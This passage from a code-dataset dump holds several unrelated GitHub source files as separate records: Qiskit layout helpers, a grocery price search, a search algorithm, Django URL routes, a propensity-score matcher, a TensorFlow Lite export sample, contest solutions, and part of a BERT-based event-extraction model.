The output list length will be as wide as the input circuit's number of qubits,\n as the output list from this method is for tracking the permutation of qubits in the\n original circuit caused by the transpiler.\n\n Args:\n filter_ancillas: If set to ``False`` any ancillas allocated in the output circuit will be\n included in the layout.\n\n Returns:\n A list of final positions for each input circuit qubit\n \"\"\"\n if self._input_qubit_count is None:\n # TODO: After there is a way to differentiate the ancilla qubits added by the transpiler\n # don't use the ancilla name anymore.See #10817 for discussion on this.\n num_source_qubits = len(\n [\n x\n for x in self.input_qubit_mapping\n if getattr(x, \"_register\", \"\").startswith(\"ancilla\")\n ]\n )\n else:\n num_source_qubits = self._input_qubit_count\n if self._output_qubit_list is None:\n circuit_qubits = list(self.final_layout.get_virtual_bits())\n else:\n circuit_qubits = self._output_qubit_list\n\n pos_to_virt = {v: k for k, v in self.input_qubit_mapping.items()}\n qubit_indices = []\n if filter_ancillas:\n num_qubits = num_source_qubits\n else:\n num_qubits = len(self._output_qubit_list)\n for index in range(num_qubits):\n qubit_idx = self.initial_layout[pos_to_virt[index]]\n if self.final_layout is not None:\n qubit_idx = self.final_layout[circuit_qubits[qubit_idx]]\n qubit_indices.append(qubit_idx)\n return qubit_indices\n\n def final_virtual_layout(self, filter_ancillas: bool = True) -> Layout:\n \"\"\"Generate the final layout as a :class:`.Layout` object\n\n This method will generate an array of final positions for each qubit in the output circuit.\n For example, if you had an input circuit like::\n\n qc = QuantumCircuit(3)\n qc.h(0)\n qc.cx(0, 1)\n qc.cx(0, 2)\n\n and the output from the transpiler was::\n\n tqc = QuantumCircuit(3)\n qc.h(2)\n qc.cx(2, 1)\n qc.swap(0, 1)\n qc.cx(2, 1)\n\n then the return from this function would be a layout object::\n\n Layout({\n qc.qubits[0]: 2,\n qc.qubits[1]: 0,\n qc.qubits[2]: 1,\n })\n\n because qubit 0 in the original circuit's final state is on qubit 3 in the output circuit,\n qubit 1 in the original circuit's final state is on qubit 0, and qubit 2's final state is\n on qubit. 
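As a quick cross-check of the two docstring examples above, the three layout helpers compose in plain Python (a minimal sketch, no Qiskit import needed; the lists reuse the numbers from the examples):

# initial_index_layout: virtual qubit i starts at physical position [2, 1, 0][i]
initial_index_layout = [2, 1, 0]
# routing_permutation: the inserted swaps move position p to routing_permutation[p]
routing_permutation = [1, 0, 2]
# final position of each original qubit = route(initial position)
final_index_layout = [routing_permutation[p] for p in initial_index_layout]
print(final_index_layout)  # [2, 0, 1], matching the final_index_layout() example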
The output list length will be as wide as the input circuit's number of qubits,\n as the output list from this method is for tracking the permutation of qubits in the\n original circuit caused by the transpiler.\n\n Args:\n filter_ancillas: If set to ``False`` any ancillas allocated in the output circuit will be\n included in the layout.\n\n Returns:\n A layout object mapping to the final positions for each qubit\n \"\"\"\n res = self.final_index_layout(filter_ancillas=filter_ancillas)\n pos_to_virt = {v: k for k, v in self.input_qubit_mapping.items()}\n return Layout({pos_to_virt[index]: phys for index, phys in enumerate(res)})\n","repo_name":"Qiskit/qiskit","sub_path":"qiskit/transpiler/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":23340,"program_lang":"python","lang":"en","doc_type":"code","stars":4020,"dataset":"github-code","pt":"22"} +{"seq_id":"43445759920","text":"import pandas as pd\nfrom rapidfuzz import fuzz\nfrom rapidfuzz import process\n\ndf = pd.read_csv('all_product_prices.csv')\ndf = df.drop_duplicates()\nproduct_names = df['product']\n\n#print(product_names.head())\nprod_list = product_names.to_list()\n\n#print(type(product_names))\nsearch_term = input(\"What product do you want to buy?\\n\")\n#search_term = search.lower()\n\nmatches = process.extract(search_term, prod_list, limit = 200, scorer = fuzz.partial_token_sort_ratio)\n\nsearch_results = []\nfor match in matches:\n if match[1] >= 80:\n search_results.append(match[0])\n\nprod_results = []\nfor prod in search_results:\n prod_info = df.loc[df['product'] == prod]\n product = prod_info['product'].to_list()\n price = prod_info['price'].to_list()\n store = prod_info['store'].to_list()\n prod_tuple = (product[0], price[0], store[0])\n prod_results.append(prod_tuple)\n\n#print(prod_results)\ndef merge_sort(lst):\n if len(lst) == 1:\n return lst\n elif len(lst) == 2:\n if lst[0][1] > lst[1][1]:\n lst[0], lst[1] = lst[1], lst[0]\n return lst\n \n left = lst[:len(lst)//2]\n right = lst[len(lst)//2:]\n\n merge_sort(left)\n merge_sort(right)\n\n lst = merge(lst, left, right)\n\n return lst\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n while i < len(arr):\n if j >= len(left):\n arr[i] = right[k]\n k += 1\n elif k >= len(right):\n arr[i] = left[j]\n j+=1\n elif left[j][1] > right[k][1]:\n arr[i] = right[k]\n k += 1\n elif left[j][1] <= right[k][1]:\n arr[i] = left[j]\n j += 1 \n i += 1\n return arr\nsorted = merge_sort(prod_results)\n\nprint(\"\\nHere are the cheapest items matching your search:\\n\")\n\ni = 1\nfor prod in sorted[:20]:\n print(f'{i}. 
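A brief aside on the hand-rolled merge_sort above: it orders the (product, price, store) tuples by their second field, which Python's built-in sort does in a few lines. A minimal equivalent sketch (the rows below are made-up stand-ins, not data from the repository):

prod_results = [("rice 2kg", 6.10, "StoreB"), ("rice 1kg", 3.50, "StoreA")]
cheapest_first = sorted(prod_results, key=lambda t: t[1])  # ascending by price
print(cheapest_first[:20])  # [('rice 1kg', 3.5, 'StoreA'), ('rice 2kg', 6.1, 'StoreB')]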
{prod[0]} priced at ${prod[1]}, from {prod[2]}.')\n i+=1\n","repo_name":"msaad-a/cheapest-groceries","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"22025211994","text":"def interpolation_search(list_, item):\n \"\"\"\n :param list_: list to be searched\n :param item: element to be searched for\n :return: True if element is in list else False\n \"\"\"\n idx0 = 0\n idxn = (len(list_) - 1)\n while idx0 < idxn and list_[idx0] <= item <= list_[idxn]:\n # Find the Mid Point\n mid = idx0 + int(((float(idxn - idx0) / (list_[idxn] - list_[idx0])) * (item - list_[idx0])))\n # Compare the value at the mid point with the search item value\n if list_[mid] == item:\n return True\n if list_[mid] < item:\n idx0 = mid + 1\n else:\n # Narrow the search from the right as well, so the loop terminates when list_[mid] > item\n idxn = mid - 1\n return False\n","repo_name":"francis-eudy/sorting-and-searching-algorithms","sub_path":"interpolation_search.py","file_name":"interpolation_search.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14483447297","text":"from __future__ import unicode_literals\n\nfrom django.conf.urls import include, url\nfrom stackdio.api.volumes import api\nfrom stackdio.core import routers\n\nmodel_router = routers.SimpleBulkRouter()\nmodel_router.register(r'users',\n api.VolumeModelUserPermissionsViewSet,\n 'volume-model-user-permissions')\nmodel_router.register(r'groups',\n api.VolumeModelGroupPermissionsViewSet,\n 'volume-model-group-permissions')\n\n\nobject_router = routers.SimpleBulkRouter()\nobject_router.register(r'users',\n api.VolumeObjectUserPermissionsViewSet,\n 'volume-object-user-permissions')\nobject_router.register(r'groups',\n api.VolumeObjectGroupPermissionsViewSet,\n 'volume-object-group-permissions')\n\n\n# note: the named group below was lost in extraction; 'pk' is assumed, as the DRF default lookup field\nurlpatterns = (\n url(r'^$',\n api.VolumeListAPIView.as_view(),\n name='volume-list'),\n\n url(r'^permissions/',\n include(model_router.urls)),\n\n url(r'^(?P<pk>[0-9]+)/$',\n api.VolumeDetailAPIView.as_view(),\n name='volume-detail'),\n\n url(r'^(?P<pk>[0-9]+)/permissions/',\n include(object_router.urls)),\n)\n","repo_name":"stackdio/stackdio","sub_path":"stackdio/api/volumes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"26536345016","text":"from typing import Any, Dict, List\n\nfrom numpy import random\nfrom pandas import DataFrame, Series\nfrom tqdm import tqdm\n\n\nclass ObsMatcher:\n def __init__(self, n_matches: int, caliper: float):\n \"\"\"\n create_match_df method -- finds similar observations and matches them between intervention and control\n Parameters\n ----------\n n_matches : int\n the number of controls to match to each minor-class (intervention group) observation\n caliper : float\n the maximum distance allowed for a match between intervention and control\n :return\n matched Dataframe\n \"\"\"\n self.n_matches = n_matches\n self.caliper = caliper\n\n def create_matches_table(self, match_ids: Dict[str, List[Any]]) -> DataFrame:\n col_names: List[str] = [f\"matched_{i}\" for i in range(1, self.n_matches + 1)]\n print(\n f'please note: '\n f'the matched dataset contains {len(match_ids)} observations from the minority class'\n )\n return DataFrame(match_ids.values(), index=match_ids.keys(), columns=col_names)\n\n def match_scores(self, p_scores: Series, label: Series) -> List[int]:\n intervention_group: Series
= p_scores[label]\n control_group: Series = p_scores[~label]\n match_ids = {}\n print('starting matching process, this might take a time')\n for index, score in tqdm(intervention_group.items(), total=len(intervention_group)):\n matches: Series = abs(control_group - score)\n matches_in_caliper: Series = matches[matches <= self.caliper]\n select: int = min(len(matches_in_caliper), self.n_matches)\n if select > 0:\n chosen: List[int] = random.choice(matches_in_caliper.index, select, replace=False).tolist()\n match_ids.update({index: chosen})\n control_group: Series = control_group.drop(index=chosen)\n\n matched_table: DataFrame = self.create_matches_table(match_ids)\n return matched_table.reset_index().melt()[\"value\"].to_list()\n","repo_name":"Riskified/ps-matching","sub_path":"src/find_similarities.py","file_name":"find_similarities.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"30358972036","text":"import tensorflow as tf\nimport numpy as np\n\nW=tf.Variable(initial_value=tf.random_normal([1]), name='weight',trainable=True)\nb=tf.Variable(initial_value=0.001,name='bias',trainable=True)\n\nx=tf.placeholder(dtype=tf.float32, shape=[1],name='x')\ny=tf.add(tf.multiply(W,x),b,name='output')\ninit=tf.global_variables_initializer()\nsaver=tf.train.Saver()\nsave_path=\"/home/\"\nmodel_save=save_path+\"saved_model.ckpt\"\n#TensorFlow session\nwith tf.Session() as sess:\n sess.run(init) #initialising the variables\n op=sess.run(y, feed_dict={x: np.reshape(1.5,[1])}) #sample run(optional)\n saver.save(sess,model_save) #saving the model\n tf.train.write_graph(sess.graph_def, save_path, 'saved_model.pbtxt')\n\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.tools import freeze_graph\n\nsave_path=\"/home/\"\nMODEL_NAME = 'Sample_model' #name of the model optional\ninput_graph_path = save_path+'saved_model.pbtxt'#complete path to the input graph\ncheckpoint_path = save_path+'saved_model.ckpt' #complete path to the model's checkpoint file\ninput_saver_def_path = \"\"\ninput_binary = False\noutput_node_names = \"output\" #output node's name. Should match to that mentioned in your code\nrestore_op_name = \"save/restore_all\"\nfilename_tensor_name = \"save/Const:0\"\noutput_frozen_graph_name = save_path+'saved_model'+'.pb' # the name of .pb file you would like to give\nclear_devices = True\n\nfreeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\n input_binary, checkpoint_path, output_node_names,\n restore_op_name, filename_tensor_name,\n output_frozen_graph_name, clear_devices, \"\") \n\nsaved_model_dir = '/home'\nconverter = tf.lite.TFLiteConverter.from_saved_model(saved_model_dir)\ntflite_model = converter.convert()\nopen(\"converted_model.tflite\", \"wb\").write(tflite_model)\n","repo_name":"callyou2mind/tensorflow","sub_path":"tf_lite_sample.py","file_name":"tf_lite_sample.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13049446286","text":"\"\"\"\n백준 16235. 
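A short illustration of the caliper-matching idea used by ObsMatcher.match_scores above, runnable on its own (the scores and labels are invented for the example; unlike ObsMatcher, this sketch does not drop a control once it has been matched):

import pandas as pd

p_scores = pd.Series([0.30, 0.32, 0.70, 0.71, 0.90])   # propensity scores
label = pd.Series([True, False, True, False, False])   # True = intervention group
caliper = 0.05
for idx, score in p_scores[label].items():
    distances = (p_scores[~label] - score).abs()
    matches = distances[distances <= caliper]          # controls within the caliper
    print(idx, "->", list(matches.index))              # prints 0 -> [1], then 2 -> [3]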
나무재테크\nblog : https://daimhada.tistory.com/114\nproblem : https://www.acmicpc.net/problem/16235\n\"\"\"\nimport sys\nfrom collections import defaultdict\ninput = sys.stdin.readline\n\ntree_count = 0\n\ndef solve(board, nutritions, tree_dict, k):\n \"\"\"\n :param board : field\n :param nutritions: given nutritions\n :param tree_dict: tree's data\n :param k: year\n :return: remained tree's count\n \"\"\"\n global tree_count\n year = 0\n dr = [-1, -1, -1, 0, 0, 1, 1, 1]\n dc = [-1, 0, 1, -1, 1, -1, 0, 1]\n\n while year < k:\n\n # spring, summer, winter\n for i in range(n*n):\n r = i // n\n c = i % n\n\n nutrition = board[r][c]\n add_nutrition = 0\n trees = tree_dict[(r, c)]\n\n # If there is no tree planted, it will only supply nutrients.\n if not trees:\n add_nutrition += nutritions[r][c]\n add_nutrition += nutrition\n board[r][c] = add_nutrition\n continue\n\n cnt = len(trees)\n temp_trees = []\n # spring & summer\n while 0 < cnt:\n tree = trees.pop()\n checked = nutrition - tree\n # check if nutrients remain\n if 0 <= checked:\n nutrition -= tree\n temp_trees.append(tree + 1)\n else:\n # 유효하지 않으므로, 나무 죽이기\n add_nutrition += (tree // 2)\n tree_count -= 1\n cnt -= 1\n # 성장한 나무들을 기존 배열에 추가해준다\n trees.extend(temp_trees)\n\n if 1 < len(trees):\n trees.sort(reverse= True)\n\n # winter\n add_nutrition += nutritions[r][c]\n add_nutrition += nutrition\n board[r][c] = add_nutrition\n\n # autumn\n for key, value in tree_dict.items():\n spread_tree_count = 0\n if len(value) == 0:\n continue\n\n for i in value:\n # if the oldest tree is less than 5, break\n if i < 5:\n break\n if i % 5 == 0:\n spread_tree_count += 1\n\n if spread_tree_count > 0:\n r, c = key\n for d in range(8):\n temp_r = r + dr[d]\n temp_c = c + dc[d]\n if 0 <= temp_r < n and 0 <= temp_c < n:\n # breed Tree\n tree_count += spread_tree_count\n tree_dict[(temp_r, temp_c)].extend([1]*spread_tree_count)\n # add year\n year += 1\n print(tree_count)\n return tree_count\n\nif __name__ == \"__main__\":\n n, m, k = map(int, input().split())\n nutritions = []\n board = [[5]*n for _ in range(n)]\n\n for i in range(n):\n nutritions.append(list(map(int, input().split())))\n\n # Store the trees(age) in dict, key is position\n tree_dict = defaultdict(lambda :[])\n for t in range(m):\n r, c, old = map(int, input().strip().split())\n tree_dict[(r-1,c-1)].append(old)\n tree_count += 1\n solve(board, nutritions, tree_dict, k)\n","repo_name":"histuckyi/algorithm","sub_path":"acmicpc/16235.py","file_name":"16235.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72384171280","text":"def is_valid(pos, size):\n row = pos[0]\n col = pos[1]\n return 0 <= row < size and 0 <= col < size\n\n\ndef get_killed_knights(row, col, size, board):\n killed_knights = 0\n rows = [-2, -1, 1, 2, 2, 1, -1, -2]\n cols = [1, 2, 2, 1, -1, -2, -2, -1]\n for i in range(8):\n current_pos = [row + rows[i], col + cols[i]]\n if is_valid(current_pos, size) and board[current_pos[0]][current_pos[1]] == \"K\":\n killed_knights += 1\n return killed_knights\n\n\nn = int(input())\nboard = []\ntotal_kills = 0\n\nfor _ in range(n):\n board.append([x for x in input()])\n\nwhile True:\n most_kills = 0\n to_kill = []\n\n for row in range(n):\n for col in range(n):\n if board[row][col] == \"K\":\n killed_knights = get_killed_knights(row, col, n, board)\n if killed_knights > most_kills:\n most_kills = killed_knights\n to_kill = [row, col]\n\n if most_kills == 0:\n break\n\n to_kill_row = 
to_kill[0]\n to_kill_col = to_kill[1]\n board[to_kill_row][to_kill_col] = \"0\"\n total_kills += 1\n\nprint(total_kills)\n\n\n#### Some other solution ####\n\n# def check_if_other_K(i, j, board): # count for each possible moves on 'L' pattern of this K how many K can reach\n# count = 0\n# if (i - 2 >= 0 and j + 1 < board_size and board[i - 2][j + 1] == 'K'):\n# count += 1\n# if (i - 2 >= 0 and j - 1 >= 0 and board[i - 2][j - 1] == 'K'):\n# count += 1\n# if (i - 1 >= 0 and j + 2 < board_size and board[i - 1][j + 2] == 'K'):\n# count += 1\n# if (i - 1 >= 0 and j - 2 >= 0 and board[i - 1][j - 2] == 'K'):\n# count += 1\n# if (i + 2 < board_size and j + 1 < board_size and board[i + 2][j + 1] == 'K'):\n# count += 1\n# if (i + 2 < board_size and j - 1 >= 0 and board[i + 2][j - 1] == 'K'):\n# count += 1\n# if (i + 1 < board_size and j + 2 < board_size and board[i + 1][j + 2] == 'K'):\n# count += 1\n# if (i + 1 < board_size and j - 2 >= 0 and board[i + 1][j - 2] == 'K'):\n# count += 1\n# return count\n#\n# board_size = int(input())\n#\n# board = [list(input()) for i in range(board_size)]\n#\n# removed = 0\n# while True:\n#\n# K_list = []\n#\n# for i in range(board_size):\n# for j in range(board_size):\n# if board[i][j] == 'K':\n# count = check_if_other_K(i, j, board)\n# if count > 0:\n# K_list.append([count, i, j]) # makes a list with count of reachable Ks and its coordinates\n#\n# if not K_list: # if list is empty, end of checking loops\n# break\n#\n# K_list = sorted(K_list, key= lambda x: -x[0]) # sort the K by the most \"dangerous\"\n#\n# i, j = K_list[0][1], K_list[0][2] # get the most \"dangerous\" K coordinates\n# board[i][j] = '0' # remove this K\n# removed += 1 # increment the number of removed K\n#\n# print(removed)","repo_name":"dechevh/Python-Advanced","sub_path":"Multidimensional-Arrays/knight_game.py","file_name":"knight_game.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26462227354","text":"# https://open.kattis.com/problems/oddmanout\n\nimport sys\n\ndef case(G):\n gs = sys.stdin.readline().split()\n gs.sort()\n\n for i in range(int(len(gs) / 2)):\n if(gs[2*i] != gs[2*i + 1]):\n return gs[2*i]\n \n return gs[len(gs) - 1]\n\nN = int(input())\nfor i in range(N):\n G = int(input())\n print(\"Case #\" + str(i + 1) + \": \" + str(case(G)))","repo_name":"yifeng-pan/competitive_programming","sub_path":"kattis/solutions/oddmanout.py","file_name":"oddmanout.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36434294071","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim import AdamW\nfrom torch.utils.data import DataLoader\nfrom transformers import BertModel\nfrom itertools import chain\nimport pickle\n\nfrom type_def import *\nfrom utils import tools, batch_tool, tokenize_tools\nfrom utils.tokenize_tools import OffsetMapping\nfrom utils.data import SimpleDataset\nfrom evaluate.evaluator import BaseEvaluator, EE_F1Evaluator, SentenceWithEvent, Events, Event, Mention, Mentions\nfrom models.model_utils import get_init_params\nfrom analysis.recorder import NaiveRecorder\n\nfrom work.EE import EE_settings, EE_utils\n\n\nclass PLMEE(nn.Module):\n def __init__(self,\n plm_lr: float = EE_settings.plm_lr,\n linear_lr: float = EE_settings.others_lr,\n plm_path: str = EE_settings.default_plm_path,\n event_types: str = EE_settings.event_types_full,\n 
role_types: str = EE_settings.role_types,\n threshold: float = EE_settings.event_detection_threshold):\n super(PLMEE, self).__init__()\n self.init_params = get_init_params(locals())\n\n self.plm_lr = plm_lr\n self.linear_lr = linear_lr\n self.plm_path = plm_path\n self.event_types = event_types\n self.role_types = role_types\n\n self.threshold = threshold\n\n self.bert = BertModel.from_pretrained(self.plm_path)\n self.hidden = self.bert.config.hidden_size\n self.trigger_linear_start = nn.Linear(self.hidden, len(self.event_types))\n self.trigger_linear_end = nn.Linear(self.hidden, len(self.event_types))\n self.argument_linear_start = nn.Linear(self.hidden, len(self.role_types))\n self.argument_linear_end = nn.Linear(self.hidden, len(self.role_types))\n\n self.init_weights()\n\n def init_weights(self):\n torch.nn.init.xavier_uniform_(self.trigger_linear_start.weight)\n self.trigger_linear_start.bias.data.fill_(0)\n torch.nn.init.xavier_uniform_(self.argument_linear_start.weight)\n self.argument_linear_start.bias.data.fill_(0)\n torch.nn.init.xavier_uniform_(self.trigger_linear_end.weight)\n self.trigger_linear_end.bias.data.fill_(0)\n torch.nn.init.xavier_uniform_(self.argument_linear_end.weight)\n self.argument_linear_end.bias.data.fill_(0)\n\n def get_optimizers(self):\n self.plm_params = self.bert.parameters()\n self.trigger_start_params = self.trigger_linear_start.parameters()\n self.trigger_end_params = self.trigger_linear_end.parameters()\n self.argument_start_params = self.argument_linear_start.parameters()\n self.argument_end_params = self.argument_linear_end.parameters()\n\n plm_optimizer = AdamW(params=self.plm_params, lr=self.plm_lr)\n linear_optimizer = AdamW(params=chain(self.trigger_start_params, self.trigger_end_params, self.argument_start_params, self.argument_end_params), lr=self.linear_lr)\n return [plm_optimizer, linear_optimizer]\n\n def forward(self, input_ids: torch.Tensor, token_type_ids: torch.Tensor, attention_mask: torch.Tensor, trigger_gt: list = None):\n \"\"\"\n\n :param input_ids: (bsz, seq_l)\n :param token_type_ids: (bsz, seq_l)\n :param attention_mask: (bsz, seq_l)\n :param trigger_gt:\n len(trigger_gt) == bsz\n len(trigger_gt[*]) == 2, start and end\n 如果为None,则根据trigger_output提取trigger信息。如果不为None,则使用该list中的下标信息对token_type_ids进行标记\n :return:\n \"\"\"\n bsz, seq_l = input_ids.shape\n trigger_output = self.predict_trigger(input_ids, token_type_ids, attention_mask) # dict\n trigger_start, trigger_end = trigger_output['trigger_start'], trigger_output['trigger_end']\n # both (bsz, seq_l, event_type_cnt)\n if trigger_gt is None:\n # 这种情况下,无反向传播\n trigger_start = trigger_start.permute([0, 2, 1])\n trigger_end = trigger_end.permute([0, 2, 1])\n # both (bsz, event_type_cnt, seq_l)\n\n trigger_start_digit = (trigger_start > self.threshold).int().tolist()\n trigger_end_digit = (trigger_end > self.threshold).int().tolist()\n # both (bsz, event_type_cnt, seq_l)\n predicts = [] # (batch, event_type, [trigger_span, arguments])\n\n for i_batch, (e_start_tensor, e_start_digit, e_end_tensor, e_end_digit) in enumerate(list(zip(trigger_start, trigger_start_digit, trigger_end, trigger_end_digit))):\n # 对每个batch考虑\n # all (event_type_cnt, seq_l)\n predicts.append([])\n # predicts[-1]存放当前句子的信息\n cur_input_ids = input_ids[i_batch].unsqueeze(0) # (seq_l)\n cur_attention_mask = input_ids[i_batch].unsqueeze(0) # (seq_l)\n for i_etype, (e_start_type_tensor, e_start_type_digit, e_end_type_tensor, e_end_type_digit) in enumerate(list(zip(e_start_tensor, e_start_digit, e_end_tensor, 
e_end_digit))):\n # 对当前句子的每个事件类型考虑\n # all (seq_l)\n predicts[-1].append([])\n # predicts[-1][-1]存放当前事件类型的信息\n # 该句子当前类型的触发词都存放在span当中\n spans = tools.argument_span_determination(e_start_type_digit, e_end_type_digit, e_start_type_tensor, e_end_type_tensor)\n # 存放该句子在每个触发词下所对应的论元的列表\n argument_preds: List[Tuple[int, List[Tuple[int, int]]]] = [] # list element: (role_type, role span list)\n # len(spans) == len(argument_preds)\n for e_span in spans:\n # argument_preds[-1]就存放论元的列表\n cur_token_type_ids = token_type_ids[i_batch].clone().detach().unsqueeze(0) # (1, seq_l)\n cur_token_type_ids[0][e_span[0]] = 1\n cur_token_type_ids[0][e_span[1]] = 1\n argument_output = self.predict_argument(cur_input_ids, cur_token_type_ids, cur_attention_mask)\n a_start, a_end = argument_output['argument_start'].squeeze(0).T, argument_output['argument_end'].squeeze(0).T\n # both (role_type_cnt, seq_l)\n for i_rtype, (e_start, e_end) in enumerate(list(zip(a_start, a_end))):\n # both (seq_l)\n a_start_digit = (e_start > self.threshold).int().tolist()\n a_end_digit = (e_end > self.threshold).int().tolist()\n cur_span = tools.argument_span_determination(a_start_digit, a_end_digit, a_start, a_end)\n if len(cur_span) != 0:\n argument_preds.append((i_rtype, cur_span))\n if len(argument_preds) != 0:\n predicts[-1][-1].append([e_span, argument_preds])\n\n # predicts[-1][-1].append(spans)\n # predicts[-1][-1].append(argument_preds)\n # predicts[-1][-1].append((spans, argument_preds))\n return {\n 'predicts': predicts\n }\n else:\n token_label = torch.zeros(token_type_ids.shape, dtype=torch.long)\n if token_type_ids.is_cuda:\n token_label = token_label.cuda()\n for idx, elem in enumerate(trigger_gt):\n token_label[idx][elem[0]] = 1\n token_label[idx][elem[1]] = 1\n token_type_ids = token_type_ids + token_label\n argument_output = self.predict_argument(input_ids, token_type_ids, attention_mask)\n a_start, a_end = argument_output['argument_start'], argument_output['argument_end']\n # both (bsz, seq_l, role_type_cnt)\n return {\n 'trigger_start_pred': trigger_start,\n 'trigger_end_pred': trigger_end,\n 'argument_start_pred': a_start,\n 'argument_end_pred': a_end,\n 'attention_mask': attention_mask\n }\n\n def predict_trigger(self, input_ids: torch.Tensor, token_type_ids: torch.Tensor, attention_mask: torch.Tensor):\n output = self.bert(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask)\n result = output[0] # (bsz, seq_l, hidden)\n\n trigger_start = torch.sigmoid(self.trigger_linear_start(result)) # (bsz, seq_l, event_type_cnt)\n trigger_end = torch.sigmoid(self.trigger_linear_end(result)) # (bsz, seq_l, event_type_cnt)\n return {\n 'trigger_start': trigger_start,\n 'trigger_end': trigger_end\n }\n\n def predict_argument(self, input_ids: torch.Tensor, token_type_ids: torch.Tensor, attention_mask: torch.Tensor):\n output = self.bert(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask)\n result = output[0] # (bsz, seq_l, hidden)\n\n argument_start = torch.sigmoid(self.argument_linear_start(result)) # (bsz, seq_l, event_type_cnt)\n argument_end = torch.sigmoid(self.argument_linear_end(result)) # (bsz, seq_l, event_type_cnt)\n return {\n 'argument_start': argument_start,\n 'argument_end': argument_end\n }\n\n\nclass PLMEE_Loss(nn.Module):\n def forward(self,\n trigger_start_pred: torch.Tensor,\n trigger_end_pred: torch.Tensor,\n argument_start_pred: torch.Tensor,\n argument_end_pred: torch.Tensor,\n attention_mask: torch.Tensor,\n trigger_start_label: torch.Tensor,\n 
trigger_end_label: torch.Tensor,\n argument_start_label: torch.Tensor,\n argument_end_label: torch.Tensor):\n \"\"\"\n\n :param trigger_start_pred: (bsz, seq_l, event_type_cnt)\n :param trigger_end_pred:\n :param argument_start_pred:\n :param argument_end_pred:\n :param attention_mask: (bsz, seq_l)\n :param trigger_start_label:\n :param trigger_end_label:\n :param argument_start_label:\n :param argument_end_label:\n :return:\n \"\"\"\n # mask = (1 - attention_mask).bool()\n #\n # # 计算mask\n # trigger_start_pred = trigger_start_pred.masked_fill(mask, value=torch.tensor(0))\n # trigger_end_pred = trigger_end_pred.masked_fill(mask, value=torch.tensor(0))\n # argument_start_pred = argument_start_pred.masked_fill(mask, value=torch.tensor(0))\n # argument_end_pred = argument_end_pred.masked_fill(mask, value=torch.tensor(0))\n\n attention_mask = attention_mask.unsqueeze(-1) # (bsz, seq_l, 1)\n # 计算loss\n trigger_start_loss = F.binary_cross_entropy(trigger_start_pred, trigger_start_label, reduction='none')\n trigger_end_loss = F.binary_cross_entropy(trigger_end_pred, trigger_end_label, reduction='none')\n argument_start_loss = F.binary_cross_entropy(argument_start_pred, argument_start_label, reduction='none')\n argument_end_loss = F.binary_cross_entropy(argument_end_pred, argument_end_label, reduction='none')\n\n ts_loss = torch.sum(trigger_start_loss * attention_mask) / torch.sum(attention_mask)\n te_loss = torch.sum(trigger_end_loss * attention_mask) / torch.sum(attention_mask)\n as_loss = torch.sum(argument_start_loss * attention_mask) / torch.sum(attention_mask)\n ae_loss = torch.sum(argument_end_loss * attention_mask) / torch.sum(attention_mask)\n\n trigger_loss = ts_loss + te_loss\n argument_loss = as_loss + ae_loss\n\n loss = trigger_loss + argument_loss\n\n return loss\n\n\ndef convert_predicts_to_SentenceWithEvent(predicts: list, sentence: str, offset_mapping: OffsetMapping, event_types: list = EE_settings.event_types_full, role_types: list = EE_settings.role_types):\n \"\"\"\n\n :param predicts: (batch, event_type, [trigger_span, arguments])\n 其中trigger span长度为2\n arguments为(trigger_span role_type)\n 在eval的条件下,默认batch_size=1\n :return:\n \"\"\"\n if len(predicts) != 1:\n raise Exception('[convert_predicts_to_SentenceWithEvent]batch_size不为1!')\n predict = predicts[0]\n events = []\n for i_etype, e_etype in enumerate(predict):\n event_type_word = event_types[i_etype]\n mentions = []\n for i_ta, e_ta in enumerate(e_etype):\n trigger_span, arguments = e_ta\n trigger_word = tokenize_tools.tokenSpan_to_word(sentence, trigger_span, offset_mapping)\n trigger_char_span = list(tokenize_tools.tokenSpan_to_charSpan(trigger_span, offset_mapping))\n for elem_arg in arguments:\n rtype_idx, arg_spans = elem_arg\n role_type_word = role_types[rtype_idx]\n for elem_role_span in arg_spans:\n role_word = tokenize_tools.tokenSpan_to_word(sentence, elem_role_span, offset_mapping)\n role_charspan = tokenize_tools.tokenSpan_to_charSpan(elem_role_span, offset_mapping)\n mentions.append({\n 'word': role_word,\n 'span': role_charspan,\n 'role': role_type_word\n })\n mentions.append({\n 'word': trigger_word,\n 'span': trigger_char_span,\n 'role': 'trigger'\n })\n\n events.append({\n 'type': event_type_word,\n 'mentions': mentions\n })\n\n sentencenwithevents = {\n 'id': '',\n 'content': sentence,\n 'events': events\n }\n return sentencenwithevents\n\n\nclass PLMEE_Evaluator(BaseEvaluator):\n def __init__(self, event_types: list = EE_settings.event_types_full, role_types: list = EE_settings.role_types):\n 
